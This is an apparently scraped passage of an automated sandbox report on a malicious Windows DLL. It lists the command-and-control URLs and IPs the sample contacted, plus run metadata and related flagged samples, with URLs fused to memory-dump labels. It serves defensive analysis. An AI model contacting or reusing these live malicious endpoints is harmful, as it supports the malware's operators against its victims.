                                              http://107.163.56.232:18963/main.phpn_Vj=rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://107.163.56.232:18963/main.phpzPrundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108671185.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108538843.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://107.163.56.232:18963/main.php.rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2821196346.000000000346A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://blog.sina.com.cn/u/5762479093zrundll32.exe, 00000004.00000003.1882444552.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000346D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://107.163.56.232:18963/main.php)rundll32.exe, 00000004.00000003.2515717945.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515936731.0000000003449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://beacon.sina.com.cn/a.gif?noScriptrundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://blog.sina.com.cn/u/5762479093OW64rundll32.exe, 00000004.00000002.3147049730.0000000006530000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://107.163.56.232:18963/main.php%rundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://107.163.56.232:18963/main.phpW5rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                http://107.163.56.232:18963/main.php$_rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  http://blog.sina.com.cn/u/5762479093jrundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://107.163.56.232:18963/main.php7rundll32.exe, 00000004.00000003.2474378153.000000000656C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://blog.sina.com.cn/srundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://107.163.56.232:18963/main.php3rundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108671185.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2108538843.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          http://blog.sina.com.cn/u/5762479093srundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://107.163.56Irundll32.exe, 00000004.00000002.3146487020.0000000005FED000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://blog.sina.com.cn/u/5762479093jrundll32.exe, 00000004.00000003.3003960520.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004095280.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004186808.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://107.163.56.232:18963/main.phpPrundll32.exe, 00000004.00000003.2392885098.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419918524.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515717945.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2474003270.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2515936731.0000000003449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2658277587.0000000003449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://upx.sf.netAmcache.hve.14.drfalse
                                                                                    		high
                                                                                    http://107.163.56.232:18963/main.phpIrundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://107.163.56.232:18963/main.phpErundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        http://107.163.56.232:18963/main.phpFrundll32.exe, 00000004.00000003.2087959262.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2088272685.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          http://107.163.56.232:18963/main.phpArundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://blog.sina.com.cn/4.rundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://107.163.56.232:18963/main.php_rundll32.exe, 00000004.00000003.3003722546.0000000003430000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3003936099.0000000003433000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.3004403420.0000000003436000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.0000000003436000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://blog.sina.com.cn/userrundll32.exe, 00000004.00000003.2331159571.000000000346F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  http://blog.sina.com.cn/u/5762479093Mrundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://107.163.56.232:18963/main.phpC:rundll32.exe, 00000004.00000002.3146735583.000000000628A000.00000004.00000010.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3146573210.000000000606D000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      http://blog.sina.com.cn/u/5762479093Irundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://blog.sina.com.cn/Srundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://blog.sina.com.cn/u/57624790935b-56076a3fa776.xml1rundll32.exe, 00000004.00000003.2250309348.000000000342E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            http://107.163.56.232:18963/main.phpUrundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              http://107.163.56.232:18963/main.phpSrundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2801828338.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                http://blog.sina.com.cn/u/5762479093Rrundll32.exe, 00000004.00000002.3142057181.000000000339A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://blog.sina.com.cn/u/5762479093Prundll32.exe, 00000004.00000003.2353062409.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2298221763.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://107.163.56.231:1530//joy.asp?sid=rungnejcndvgnJgFe5vteX8v29rundll32.exe, 00000004.00000002.3141638484.0000000002FAC000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      https://blog.sina.com.cn/u/5762479093Krundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://blog.sina.com.cn/krundll32.exe, 00000004.00000003.2088146203.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://107.163.56.232:18963/main.phpkrundll32.exe, 00000004.00000003.1882444552.000000000346D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000346D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://blog.sina.com.cn/u/5762479093Prundll32.exe, 00000004.00000003.2271634293.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2271351006.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://107.163.56.232:18963/main.phpjrundll32.exe, 00000004.00000003.2821196346.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742497839.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.3142349682.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2742387741.0000000003444000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698703869.000000000344A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743299996.0000000003454000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2820845242.0000000003446000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2743122739.0000000003453000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                http://107.163.56.232:18963/main.phpgrundll32.exe, 00000004.00000003.1948233905.0000000003448000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  http://blog.sina.com.cn/u/%sorundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://blog.sina.com.cn/u/5762479093Frundll32.exe, 00000004.00000003.2639468391.000000000344B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2048262061.0000000003448000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2658277587.0000000003449000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2640231182.000000000344B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2129869017.0000000003454000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://blog.sina.com.cn/u/5762479093Grundll32.exe, 00000004.00000003.1948413100.0000000006537000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://blog.sina.com.cn/u/%ssrundll32.exe, 00000004.00000002.3144079935.0000000005164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://blog.sina.com.cn/rundll32.exe, 00000004.00000003.2087959262.0000000003470000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2419824510.0000000006569000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://portrait6.sinaimg.cn/5762479093/blog/180rundll32.exe, 00000004.00000002.3144079935.000000000516C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1881972939.000000000345D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1882444552.0000000003466000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880827011.0000000005167000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880865322.0000000005165000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1880671676.0000000005164000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://blog.sina.com.cn/arundll32.exe, 00000004.00000003.2698318369.0000000003471000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.2698113804.0000000003471000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high

                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                Public IPs

                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                107.163.56.232
                                                                                                                                                		unknownUnited States
                                                                                                                                                		20248TAKE2UStrue
                                                                                                                                                116.133.8.92
                                                                                                                                                		blogx.sina.com.cnChina
                                                                                                                                                		4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                                                                                                                                                107.163.56.231
                                                                                                                                                		unknownUnited States
                                                                                                                                                		20248TAKE2UStrue
                                                                                                                                                107.163.56.110
                                                                                                                                                		unknownUnited States
                                                                                                                                                		20248TAKE2UStrue
                                                                                                                                                107.163.56.251
                                                                                                                                                		unknownUnited States
                                                                                                                                                		20248TAKE2UStrue

                                                                                                                                                Private

                                                                                                                                                IP
                                                                                                                                                127.0.0.1

                                                                                                                                                General Information

                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                Analysis ID:1578341
                                                                                                                                                Start date and time:2024-12-19 15:42:53 +01:00
                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                Overall analysis duration:0h 10m 56s
                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                Report type:full
                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                Number of analysed new started processes analysed:39
                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                Technologies:
                                                                                                                                                • HCA enabled
                                                                                                                                                • EGA enabled
                                                                                                                                                • AMSI enabled
                                                                                                                                                Analysis Mode:default
                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                Sample name:2JSGOlbNym.dll
                                                                                                                                                renamed because original name is a hash value
                                                                                                                                                Original Sample Name:bc3a8653c59edabf91eb545f7d9dcf818f3ef003.dll
                                                                                                                                                Detection:MAL
                                                                                                                                                Classification:mal100.troj.spyw.evad.winDLL@42/12@1/6
                                                                                                                                                EGA Information:
                                                                                                                                                • Successful, ratio: 100%
                                                                                                                                                HCA Information:
                                                                                                                                                • Successful, ratio: 96%
                                                                                                                                                • Number of executed functions: 37
                                                                                                                                                • Number of non-executed functions: 67
                                                                                                                                                Cookbook Comments:
                                                                                                                                                • Found application associated with file extension: .dll
                                                                                                                                                • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                Warnings

                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                • Excluded IPs from analysis (whitelisted): 199.232.214.172, 20.189.173.22, 23.193.114.18, 23.193.114.26, 20.190.147.11, 20.109.210.53
                                                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, a767.dspw65.akamai.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net
                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                • VT rate limit hit for: 2JSGOlbNym.dll

                                                                                                                                                Simulations

                                                                                                                                                Behavior and APIs

                                                                                                                                                TimeTypeDescription
                                                                                                                                                09:44:09API Interceptor1509473x Sleep call for process: rundll32.exe modified
                                                                                                                                                09:44:16API Interceptor1x Sleep call for process: loaddll32.exe modified
                                                                                                                                                09:44:44API Interceptor2x Sleep call for process: WerFault.exe modified

                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                IPs

                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                107.163.56.23202hNixBIvP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  abc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                    116.133.8.924hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                    • blog.sina.com.cn/u/5762479093
                                                                                                                                                    QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                    • blog.sina.com.cn/u/5762479093
                                                                                                                                                    107.163.56.23102hNixBIvP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      abc.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                        107.163.56.1104hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.163.56.110:18530/u1129.html
                                                                                                                                                        QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                        • 107.163.56.110:18530/u1129.html
                                                                                                                                                        107.163.56.2514hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                          yKVQVNB2qI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                            oQy3XhO4cX.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                              gmqIbj35WF.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                Bcr1Wl2Jn0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                  OL50O9ho5M.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                    02hNixBIvP.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      abc.dllGet hashmaliciousUnknownBrowse

                                                                                                                                                                        Domains

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        blogx.sina.com.cn4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 202.108.0.52
                                                                                                                                                                        bg.microsoft.map.fastly.net4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                        I3FtIOCni3.dllGet hashmaliciousGhostRatBrowse
                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                        26B1sczZ88.dllGet hashmaliciousVirutBrowse
                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                        UV0zBp62hW.dllGet hashmaliciousVirutBrowse
                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                        Gioia Faggioli-End Of Year-Bonus.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                        https://tfsroanoke.com/home/tfs/public_html/new/ckfinder/userfiles/files/12719803849.pdfGet hashmaliciousPDFPhishBrowse
                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                        jhsdgfjkh236.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                        RECOUVREMENT -FACTURER1184521.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                        QhR8Zp6fZs.lnkGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                        LbtytfWpvx.vbsGet hashmaliciousRemcosBrowse
                                                                                                                                                                        • 199.232.210.172

                                                                                                                                                                        ASNs

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        CHINA169-BACKBONECHINAUNICOMChina169BackboneCN4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 218.25.216.71
                                                                                                                                                                        QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 116.162.244.198
                                                                                                                                                                        sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 110.230.131.214
                                                                                                                                                                        arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 124.133.226.227
                                                                                                                                                                        arm7.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 112.85.190.34
                                                                                                                                                                        x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 218.28.241.0
                                                                                                                                                                        mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 112.247.180.189
                                                                                                                                                                        sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                        • 42.179.207.24
                                                                                                                                                                        TAKE2US4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.251
                                                                                                                                                                        QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.232
                                                                                                                                                                        XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.204
                                                                                                                                                                        nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.232
                                                                                                                                                                        otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.232
                                                                                                                                                                        XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.204
                                                                                                                                                                        08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        TAKE2US4hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.251
                                                                                                                                                                        QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        peks66Iy06.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.232
                                                                                                                                                                        XXHYneydvF.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.204
                                                                                                                                                                        nt11qTrX4f.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.232
                                                                                                                                                                        otsIBG7J9b.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.232
                                                                                                                                                                        XgijTrY6No.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.241.204
                                                                                                                                                                        08e2VwqyI0.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        PqZ6GU98Eh.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110
                                                                                                                                                                        jYAKmjIPgI.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 107.163.56.110

                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e194hSuRTwnWJ.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        QCTYoyX422.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        PURCHASE ORDER TRC-090971819130-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                                        • 116.133.8.92
                                                                                                                                                                        PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
